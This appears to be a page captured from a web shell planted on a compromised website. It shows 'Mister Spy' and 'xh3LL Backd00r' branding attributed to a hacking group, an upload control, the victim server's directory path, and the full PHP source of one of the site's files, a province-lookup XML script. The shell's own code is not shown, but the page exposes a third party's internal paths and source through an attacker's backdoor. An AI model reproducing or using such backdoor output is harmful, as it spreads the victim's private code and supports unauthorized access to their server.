Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/
Upload File :
Current File : /home/caballoscriollos/www/espanol/xml_regiones_a_provincias.php

<?php 
require_once('../Connections/cnx.php') ;
header("content-type: text/xml") ;
?>
<retorno>
	<registro>
		<campoid></campoid>
		<camponombre></camponombre>
	</registro>
<? 

$filtro = "-1";
if (isset($_GET['ID']))
  $filtro = (get_magic_quotes_gpc()) ? intval($_GET['ID']) : addslashes(intval($_GET['ID']));

mysql_select_db($database_cnx, $cnx);
$query_rsProvincia = "SELECT provinciaID as ID, provincia as nombre FROM provincias WHERE regionID='".$filtro."' ORDER BY provincia ASC";
$rsProvincia       = mysql_query($query_rsProvincia, $cnx) or die(mysql_error());
$row_rsProvincia   = mysql_fetch_assoc($rsProvincia);
$totalRows_rsProvincia = mysql_num_rows($rsProvincia);


if( $totalRows_rsProvincia > 0 )
{ 
	do 
	{ 
	?><registro>
			<campoid><?=utf8_encode($row_rsProvincia['ID'])?></campoid>
			<camponombre><?=utf8_encode($row_rsProvincia['nombre'])?></camponombre>
		</registro><?php 
	}
	while( $row_rsProvincia=mysql_fetch_assoc($rsProvincia) ) ;
}

mysql_free_result($rsProvincia) ;  
?>
</retorno>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat